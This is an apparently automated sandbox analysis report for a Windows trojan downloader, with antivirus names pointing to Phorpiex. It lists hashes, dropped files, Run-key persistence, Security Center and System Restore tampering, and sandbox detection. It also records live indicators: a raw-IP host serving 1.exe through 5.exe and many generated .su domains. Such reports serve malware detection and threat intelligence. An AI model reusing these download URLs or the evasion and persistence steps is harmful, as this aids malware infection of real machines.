paladin316

Exes_56c329b835490a887a6a941adfa6e4c2_exe.json

Jun 19th, 2019
  1.  
  2. [*] MalFamily: ""
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Exes_56c329b835490a887a6a941adfa6e4c2.exe"
  7. [*] File Size: 292352
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "fa9020c32b1c1b810b6c261e77863411bc64e70aed6d2a3bbbb82ebdcbaf8740"
  10. [*] MD5: "56c329b835490a887a6a941adfa6e4c2"
  11. [*] SHA1: "fa831efbbe48deb179980e00042c91ae99d5bf20"
  12. [*] SHA512: "a29b5ae11a016b6d64bbd482416e476525f6e67d34e11485aa47a6e361a0b451492d4422647b0a79a9f69086c85faed987236ebafb9c80410a5c9efe7c7bcba9"
  13. [*] CRC32: "0DF89228"
  14. [*] SSDEEP: "6144:UvTr7niBcKnBGNYzF4BupEjMvFs4/2bR4d:637nOcKByKF4BAEQO4/O4d"
  15.  
  16. [*] Process Execution: [
  17. "Exes_56c329b835490a887a6a941adfa6e4c2.exe",
  18. "winmonw.exe",
  19. "1017334714.exe",
  20. "3625111283.exe"
  21. ]
  22.  
  23. [*] Signatures Detected: [
  24. {
  25. "Description": "Creates RWX memory",
  26. "Details": []
  27. },
  28. {
  29. "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
  30. "Details": []
  31. },
  32. {
  33. "Description": "Drops a binary and executes it",
  34. "Details": [
  35. {
  36. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe"
  37. },
  38. {
  39. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
  40. },
  41. {
  42. "binary": "C:\\Windows\\3356173911556488\\winmonw.exe"
  43. }
  44. ]
  45. },
  46. {
  47. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  48. "Details": [
  49. {
  50. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  51. },
  52. {
  53. "suspicious_request": "http://193.32.161.77/tldr.php?new=1"
  54. },
  55. {
  56. "suspicious_request": "http://193.32.161.77/tldr.php?on=1"
  57. },
  58. {
  59. "suspicious_request": "http://193.32.161.77/1.exe"
  60. },
  61. {
  62. "suspicious_request": "http://193.32.161.77/2.exe"
  63. },
  64. {
  65. "suspicious_request": "http://193.32.161.77/3.exe"
  66. },
  67. {
  68. "suspicious_request": "http://193.32.161.77/4.exe"
  69. },
  70. {
  71. "suspicious_request": "http://193.32.161.77/5.exe"
  72. },
  73. {
  74. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  75. },
  76. {
  77. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  78. },
  79. {
  80. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  81. }
  82. ]
  83. },
  84. {
  85. "Description": "Performs some HTTP requests",
  86. "Details": [
  87. {
  88. "url": "http://193.32.161.77/tldr.php?new=1"
  89. },
  90. {
  91. "url": "http://193.32.161.77/tldr.php?on=1"
  92. },
  93. {
  94. "url": "http://193.32.161.77/1.exe"
  95. },
  96. {
  97. "url": "http://193.32.161.77/2.exe"
  98. },
  99. {
  100. "url": "http://193.32.161.77/3.exe"
  101. },
  102. {
  103. "url": "http://193.32.161.77/4.exe"
  104. },
  105. {
  106. "url": "http://193.32.161.77/5.exe"
  107. },
  108. {
  109. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  110. },
  111. {
  112. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  113. },
  114. {
  115. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  116. }
  117. ]
  118. },
  119. {
  120. "Description": "Detects Sandboxie through the presence of a library",
  121. "Details": []
  122. },
  123. {
  124. "Description": "Detects SunBelt Sandbox through the presence of a library",
  125. "Details": []
  126. },
  127. {
  128. "Description": "Attempts to remove evidence of file being downloaded from the Internet",
  129. "Details": [
  130. {
  131. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe:Zone.Identifier"
  132. }
  133. ]
  134. },
  135. {
  136. "Description": "Installs itself for autorun at Windows startup",
  137. "Details": [
  138. {
  139. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
  140. },
  141. {
  142. "data": "C:\\Windows\\3356173911556488\\winmonw.exe"
  143. },
  144. {
  145. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
  146. },
  147. {
  148. "data": "C:\\Windows\\3356173911556488\\winmonw.exe"
  149. }
  150. ]
  151. },
  152. {
  153. "Description": "Creates a hidden or system file",
  154. "Details": [
  155. {
  156. "file": "C:\\Windows\\3356173911556488"
  157. },
  158. {
  159. "file": "C:\\Windows\\3356173911556488\\winmonw.exe"
  160. },
  161. {
  162. "file": "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt"
  163. }
  164. ]
  165. },
  166. {
  167. "Description": "File has been identified by 38 Antiviruses on VirusTotal as malicious",
  168. "Details": [
  169. {
  170. "MicroWorld-eScan": "Trojan.GenericKD.41379811"
  171. },
  172. {
  173. "FireEye": "Generic.mg.56c329b835490a88"
  174. },
  175. {
  176. "McAfee": "Trojan-FQZA!56C329B83549"
  177. },
  178. {
  179. "AegisLab": "Trojan.Win32.Generic.mnLK"
  180. },
  181. {
  182. "K7AntiVirus": "Riskware ( 0040eff71 )"
  183. },
  184. {
  185. "Cybereason": "malicious.bbe48d"
  186. },
  187. {
  188. "Symantec": "ML.Attribute.HighConfidence"
  189. },
  190. {
  191. "ESET-NOD32": "a variant of Win32/Kryptik.GUBX"
  192. },
  193. {
  194. "APEX": "Malicious"
  195. },
  196. {
  197. "Paloalto": "generic.ml"
  198. },
  199. {
  200. "Kaspersky": "Trojan-Downloader.Win32.Trik.fx"
  201. },
  202. {
  203. "BitDefender": "Trojan.GenericKD.41379811"
  204. },
  205. {
  206. "Avast": "Win32:Trojan-gen"
  207. },
  208. {
  209. "Ad-Aware": "Trojan.Ransomware.GenericKDS.32066721"
  210. },
  211. {
  212. "Comodo": "TrojWare.Win32.Fakecsrss.AV@88nqyj"
  213. },
  214. {
  215. "F-Secure": "Trojan.TR/AD.Phorpiex.vkkfn"
  216. },
  217. {
  218. "Invincea": "heuristic"
  219. },
  220. {
  221. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.dh"
  222. },
  223. {
  224. "Emsisoft": "Trojan.GenericKD.41379811 (B)"
  225. },
  226. {
  227. "Endgame": "malicious (high confidence)"
  228. },
  229. {
  230. "Avira": "TR/AD.Phorpiex.vkkfn"
  231. },
  232. {
  233. "Microsoft": "Trojan:Win32/Fuery.A!cl"
  234. },
  235. {
  236. "Arcabit": "Trojan.Ransomware.GenericS.D1E94CA1"
  237. },
  238. {
  239. "ViRobot": "Trojan.Win32.Z.Highconfidence.292352.B"
  240. },
  241. {
  242. "ZoneAlarm": "Trojan-Downloader.Win32.Trik.fx"
  243. },
  244. {
  245. "GData": "Win32.Worm.Phorpiex.402DNM"
  246. },
  247. {
  248. "AhnLab-V3": "Malware/Win32.Generic.C3291999"
  249. },
  250. {
  251. "Acronis": "suspicious"
  252. },
  253. {
  254. "VBA32": "BScope.Trojan.Sehyioa"
  255. },
  256. {
  257. "Cylance": "Unsafe"
  258. },
  259. {
  260. "Rising": "Trojan.Fuery!8.EAFB (CLOUD)"
  261. },
  262. {
  263. "SentinelOne": "DFI - Suspicious PE"
  264. },
  265. {
  266. "Fortinet": "W32/Kryptik.GUBX!tr"
  267. },
  268. {
  269. "MaxSecure": "Ransomeware.GandCrypt.Gen"
  270. },
  271. {
  272. "AVG": "Win32:Trojan-gen"
  273. },
  274. {
  275. "Panda": "Trj/Genetic.gen"
  276. },
  277. {
  278. "CrowdStrike": "win/malicious_confidence_70% (W)"
  279. },
  280. {
  281. "Qihoo-360": "HEUR/QVM10.2.F183.Malware.Gen"
  282. }
  283. ]
  284. },
  285. {
  286. "Description": "Operates on local firewall's policies and settings",
  287. "Details": []
  288. },
  289. {
  290. "Description": "Creates a copy of itself",
  291. "Details": [
  292. {
  293. "copy": "C:\\Windows\\3356173911556488\\winmonw.exe"
  294. },
  295. {
  296. "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe"
  297. }
  298. ]
  299. },
  300. {
  301. "Description": "Attempts to disable System Restore",
  302. "Details": []
  303. },
  304. {
  305. "Description": "Attempts to modify or disable Security Center warnings",
  306. "Details": []
  307. },
  308. {
  309. "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
  310. "Details": [
  311. {
  312. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_56c329b835490a887a6a941adfa6e4c2.exe:Zone.Iduentifier"
  313. },
  314. {
  315. "file": "C:\\Windows\\3356173911556488\\winmonw.exe:Zone.Iduentifier"
  316. }
  317. ]
  318. },
  319. {
  320. "Description": "Created network traffic indicative of malicious activity",
  321. "Details": [
  322. {
  323. "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
  324. },
  325. {
  326. "signature": "ET DNS Query for .su TLD (Soviet Union) Often Malware Related"
  327. }
  328. ]
  329. }
  330. ]
  331.  
  332. [*] Started Service: []
  333.  
  334. [*] Executed Commands: [
  335. "C:\\Windows\\3356173911556488\\winmonw.exe",
  336. "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe",
  337. "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
  338. ]
  339.  
  340. [*] Mutexes: [
  341. "4550003930"
  342. ]
  343.  
  344. [*] Modified Files: [
  345. "C:\\Windows\\3356173911556488\\winmonw.exe",
  346. "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt",
  347. "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe",
  348. "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
  349. ]
  350.  
  351. [*] Deleted Files: [
  352. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_56c329b835490a887a6a941adfa6e4c2.exe:Zone.Iduentifier",
  353. "C:\\Windows\\3356173911556488\\winmonw.exe:Zone.Iduentifier",
  354. "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe:Zone.Identifier",
  355. "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe:Zone.Identifier"
  356. ]
  357.  
  358. [*] Modified Registry Keys: [
  359. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
  360. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
  361. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusOverride",
  362. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesOverride",
  363. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallOverride",
  364. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusDisableNotify",
  365. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesDisableNotify",
  366. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AutoUpdateDisableNotify",
  367. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallDisableNotify",
  368. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR"
  369. ]
  370.  
  371. [*] Deleted Registry Keys: []
  372.  
  373. [*] DNS Communications: [
  374. {
  375. "type": "A",
  376. "request": "aiheiufisd.su",
  377. "answers": [
  378. {
  379. "data": "",
  380. "type": "NXDOMAIN"
  381. }
  382. ]
  383. },
  384. {
  385. "type": "A",
  386. "request": "aeoghehofu.su",
  387. "answers": [
  388. {
  389. "data": "",
  390. "type": "NXDOMAIN"
  391. }
  392. ]
  393. },
  394. {
  395. "type": "A",
  396. "request": "aniaeninie.su",
  397. "answers": [
  398. {
  399. "data": "",
  400. "type": "NXDOMAIN"
  401. }
  402. ]
  403. },
  404. {
  405. "type": "A",
  406. "request": "aiaeufaehe.su",
  407. "answers": [
  408. {
  409. "data": "",
  410. "type": "NXDOMAIN"
  411. }
  412. ]
  413. },
  414. {
  415. "type": "A",
  416. "request": "aieieieros.su",
  417. "answers": [
  418. {
  419. "data": "",
  420. "type": "NXDOMAIN"
  421. }
  422. ]
  423. },
  424. {
  425. "type": "A",
  426. "request": "abaeubuegs.su",
  427. "answers": [
  428. {
  429. "data": "",
  430. "type": "NXDOMAIN"
  431. }
  432. ]
  433. },
  434. {
  435. "type": "A",
  436. "request": "aeubeufubg.su",
  437. "answers": [
  438. {
  439. "data": "",
  440. "type": "NXDOMAIN"
  441. }
  442. ]
  443. },
  444. {
  445. "type": "A",
  446. "request": "aeuaueudgs.su",
  447. "answers": [
  448. {
  449. "data": "",
  450. "type": "NXDOMAIN"
  451. }
  452. ]
  453. },
  454. {
  455. "type": "A",
  456. "request": "xiheiufisd.su",
  457. "answers": [
  458. {
  459. "data": "",
  460. "type": "NXDOMAIN"
  461. }
  462. ]
  463. },
  464. {
  465. "type": "A",
  466. "request": "xeoghehofu.su",
  467. "answers": [
  468. {
  469. "data": "",
  470. "type": "NXDOMAIN"
  471. }
  472. ]
  473. },
  474. {
  475. "type": "A",
  476. "request": "xniaeninie.su",
  477. "answers": [
  478. {
  479. "data": "",
  480. "type": "NXDOMAIN"
  481. }
  482. ]
  483. },
  484. {
  485. "type": "A",
  486. "request": "xiaeufaehe.su",
  487. "answers": [
  488. {
  489. "data": "",
  490. "type": "NXDOMAIN"
  491. }
  492. ]
  493. },
  494. {
  495. "type": "A",
  496. "request": "xieieieros.su",
  497. "answers": [
  498. {
  499. "data": "",
  500. "type": "NXDOMAIN"
  501. }
  502. ]
  503. },
  504. {
  505. "type": "A",
  506. "request": "xbaeubuegs.su",
  507. "answers": [
  508. {
  509. "data": "",
  510. "type": "NXDOMAIN"
  511. }
  512. ]
  513. },
  514. {
  515. "type": "A",
  516. "request": "teubeufubg.su",
  517. "answers": [
  518. {
  519. "data": "",
  520. "type": "NXDOMAIN"
  521. }
  522. ]
  523. },
  524. {
  525. "type": "A",
  526. "request": "teuaueudgs.su",
  527. "answers": [
  528. {
  529. "data": "",
  530. "type": "NXDOMAIN"
  531. }
  532. ]
  533. },
  534. {
  535. "type": "A",
  536. "request": "tiheiufisd.su",
  537. "answers": [
  538. {
  539. "data": "",
  540. "type": "NXDOMAIN"
  541. }
  542. ]
  543. },
  544. {
  545. "type": "A",
  546. "request": "teoghehofu.su",
  547. "answers": [
  548. {
  549. "data": "",
  550. "type": "NXDOMAIN"
  551. }
  552. ]
  553. },
  554. {
  555. "type": "A",
  556. "request": "tniaeninie.su",
  557. "answers": [
  558. {
  559. "data": "",
  560. "type": "NXDOMAIN"
  561. }
  562. ]
  563. },
  564. {
  565. "type": "A",
  566. "request": "tiaeufaehe.su",
  567. "answers": [
  568. {
  569. "data": "",
  570. "type": "NXDOMAIN"
  571. }
  572. ]
  573. },
  574. {
  575. "type": "A",
  576. "request": "tieieieros.su",
  577. "answers": [
  578. {
  579. "data": "",
  580. "type": "NXDOMAIN"
  581. }
  582. ]
  583. },
  584. {
  585. "type": "A",
  586. "request": "tbaeubuegs.su",
  587. "answers": [
  588. {
  589. "data": "",
  590. "type": "NXDOMAIN"
  591. }
  592. ]
  593. },
  594. {
  595. "type": "A",
  596. "request": "wiheiufisd.su",
  597. "answers": [
  598. {
  599. "data": "",
  600. "type": "NXDOMAIN"
  601. }
  602. ]
  603. },
  604. {
  605. "type": "A",
  606. "request": "weoghehofu.su",
  607. "answers": [
  608. {
  609. "data": "",
  610. "type": "NXDOMAIN"
  611. }
  612. ]
  613. },
  614. {
  615. "type": "A",
  616. "request": "wniaeninie.su",
  617. "answers": [
  618. {
  619. "data": "",
  620. "type": "NXDOMAIN"
  621. }
  622. ]
  623. },
  624. {
  625. "type": "A",
  626. "request": "wiaeufaehe.su",
  627. "answers": [
  628. {
  629. "data": "",
  630. "type": "NXDOMAIN"
  631. }
  632. ]
  633. },
  634. {
  635. "type": "A",
  636. "request": "wieieieros.su",
  637. "answers": [
  638. {
  639. "data": "",
  640. "type": "NXDOMAIN"
  641. }
  642. ]
  643. },
  644. {
  645. "type": "A",
  646. "request": "wbaeubuegs.su",
  647. "answers": [
  648. {
  649. "data": "",
  650. "type": "NXDOMAIN"
  651. }
  652. ]
  653. },
  654. {
  655. "type": "A",
  656. "request": "weubeufubg.su",
  657. "answers": [
  658. {
  659. "data": "",
  660. "type": "NXDOMAIN"
  661. }
  662. ]
  663. },
  664. {
  665. "type": "A",
  666. "request": "weuaueudgs.su",
  667. "answers": [
  668. {
  669. "data": "",
  670. "type": "NXDOMAIN"
  671. }
  672. ]
  673. }
  674. ]
  675.  
  676. [*] Domains: [
  677. {
  678. "ip": "",
  679. "domain": "teubeufubg.su"
  680. },
  681. {
  682. "ip": "",
  683. "domain": "tbaeubuegs.su"
  684. },
  685. {
  686. "ip": "",
  687. "domain": "wniaeninie.su"
  688. },
  689. {
  690. "ip": "",
  691. "domain": "aiaeufaehe.su"
  692. },
  693. {
  694. "ip": "",
  695. "domain": "xiheiufisd.su"
  696. },
  697. {
  698. "ip": "",
  699. "domain": "teuaueudgs.su"
  700. },
  701. {
  702. "ip": "",
  703. "domain": "xbaeubuegs.su"
  704. },
  705. {
  706. "ip": "",
  707. "domain": "wiheiufisd.su"
  708. },
  709. {
  710. "ip": "",
  711. "domain": "xeoghehofu.su"
  712. },
  713. {
  714. "ip": "",
  715. "domain": "wbaeubuegs.su"
  716. },
  717. {
  718. "ip": "",
  719. "domain": "abaeubuegs.su"
  720. },
  721. {
  722. "ip": "",
  723. "domain": "tieieieros.su"
  724. },
  725. {
  726. "ip": "",
  727. "domain": "aeuaueudgs.su"
  728. },
  729. {
  730. "ip": "",
  731. "domain": "weubeufubg.su"
  732. },
  733. {
  734. "ip": "",
  735. "domain": "wiaeufaehe.su"
  736. },
  737. {
  738. "ip": "",
  739. "domain": "aeubeufubg.su"
  740. },
  741. {
  742. "ip": "",
  743. "domain": "aeoghehofu.su"
  744. },
  745. {
  746. "ip": "",
  747. "domain": "weoghehofu.su"
  748. },
  749. {
  750. "ip": "",
  751. "domain": "aniaeninie.su"
  752. },
  753. {
  754. "ip": "",
  755. "domain": "xieieieros.su"
  756. },
  757. {
  758. "ip": "",
  759. "domain": "wieieieros.su"
  760. },
  761. {
  762. "ip": "",
  763. "domain": "tiaeufaehe.su"
  764. },
  765. {
  766. "ip": "",
  767. "domain": "aiheiufisd.su"
  768. },
  769. {
  770. "ip": "",
  771. "domain": "xiaeufaehe.su"
  772. },
  773. {
  774. "ip": "",
  775. "domain": "tniaeninie.su"
  776. },
  777. {
  778. "ip": "",
  779. "domain": "xniaeninie.su"
  780. },
  781. {
  782. "ip": "",
  783. "domain": "weuaueudgs.su"
  784. },
  785. {
  786. "ip": "",
  787. "domain": "teoghehofu.su"
  788. },
  789. {
  790. "ip": "",
  791. "domain": "aieieieros.su"
  792. },
  793. {
  794. "ip": "",
  795. "domain": "tiheiufisd.su"
  796. }
  797. ]
  798.  
  799. [*] Network Communication - ICMP: []
  800.  
  801. [*] Network Communication - HTTP: [
  802. {
  803. "count": 1,
  804. "body": "",
  805. "uri": "http://193.32.161.77/tldr.php?new=1",
  806. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  807. "method": "GET",
  808. "host": "193.32.161.77",
  809. "version": "1.1",
  810. "path": "/tldr.php?new=1",
  811. "data": "GET /tldr.php?new=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  812. "port": 80
  813. },
  814. {
  815. "count": 1,
  816. "body": "",
  817. "uri": "http://193.32.161.77/tldr.php?on=1",
  818. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  819. "method": "GET",
  820. "host": "193.32.161.77",
  821. "version": "1.1",
  822. "path": "/tldr.php?on=1",
  823. "data": "GET /tldr.php?on=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  824. "port": 80
  825. },
  826. {
  827. "count": 2,
  828. "body": "",
  829. "uri": "http://193.32.161.77/1.exe",
  830. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  831. "method": "GET",
  832. "host": "193.32.161.77",
  833. "version": "1.1",
  834. "path": "/1.exe",
  835. "data": "GET /1.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  836. "port": 80
  837. },
  838. {
  839. "count": 1,
  840. "body": "",
  841. "uri": "http://193.32.161.77/2.exe",
  842. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  843. "method": "GET",
  844. "host": "193.32.161.77",
  845. "version": "1.1",
  846. "path": "/2.exe",
  847. "data": "GET /2.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  848. "port": 80
  849. },
  850. {
  851. "count": 2,
  852. "body": "",
  853. "uri": "http://193.32.161.77/3.exe",
  854. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  855. "method": "GET",
  856. "host": "193.32.161.77",
  857. "version": "1.1",
  858. "path": "/3.exe",
  859. "data": "GET /3.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  860. "port": 80
  861. },
  862. {
  863. "count": 1,
  864. "body": "",
  865. "uri": "http://193.32.161.77/4.exe",
  866. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  867. "method": "GET",
  868. "host": "193.32.161.77",
  869. "version": "1.1",
  870. "path": "/4.exe",
  871. "data": "GET /4.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  872. "port": 80
  873. },
  874. {
  875. "count": 1,
  876. "body": "",
  877. "uri": "http://193.32.161.77/5.exe",
  878. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
  879. "method": "GET",
  880. "host": "193.32.161.77",
  881. "version": "1.1",
  882. "path": "/5.exe",
  883. "data": "GET /5.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
  884. "port": 80
  885. },
  886. {
  887. "count": 1,
  888. "body": "",
  889. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  890. "user-agent": "Microsoft-CryptoAPI/6.1",
  891. "method": "GET",
  892. "host": "ocsp.digicert.com",
  893. "version": "1.1",
  894. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  895. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 150849\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 10:50:30 GMT\r\nIf-None-Match: \"5ced1276-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  896. "port": 80
  897. },
  898. {
  899. "count": 1,
  900. "body": "",
  901. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  902. "user-agent": "Microsoft-CryptoAPI/6.1",
  903. "method": "GET",
  904. "host": "ocsp.digicert.com",
  905. "version": "1.1",
  906. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  907. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nCache-Control: max-age = 135176\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 05:30:18 GMT\r\nIf-None-Match: \"5cecc76a-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  908. "port": 80
  909. },
  910. {
  911. "count": 1,
  912. "body": "",
  913. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  914. "user-agent": "Microsoft-CryptoAPI/6.1",
  915. "method": "GET",
  916. "host": "ocsp.digicert.com",
  917. "version": "1.1",
  918. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  919. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 168744\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 15:00:08 GMT\r\nIf-None-Match: \"5ced4cf8-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  920. "port": 80
  921. }
  922. ]
  923.  
  924. [*] Network Communication - SMTP: []
  925.  
  926. [*] Network Communication - Hosts: []
  927.  
  928. [*] Network Communication - IRC: []
  929.  
  930. [*] Static Analysis: {
  931. "pe": {
  932. "peid_signatures": null,
  933. "imports": [
  934. {
  935. "imports": [
  936. {
  937. "name": "FillConsoleOutputCharacterA",
  938. "address": "0x42b000"
  939. },
  940. {
  941. "name": "HeapReAlloc",
  942. "address": "0x42b004"
  943. },
  944. {
  945. "name": "GetNativeSystemInfo",
  946. "address": "0x42b008"
  947. },
  948. {
  949. "name": "SetLocaleInfoA",
  950. "address": "0x42b00c"
  951. },
  952. {
  953. "name": "WritePrivateProfileStructA",
  954. "address": "0x42b010"
  955. },
  956. {
  957. "name": "GetDefaultCommConfigW",
  958. "address": "0x42b014"
  959. },
  960. {
  961. "name": "FindResourceW",
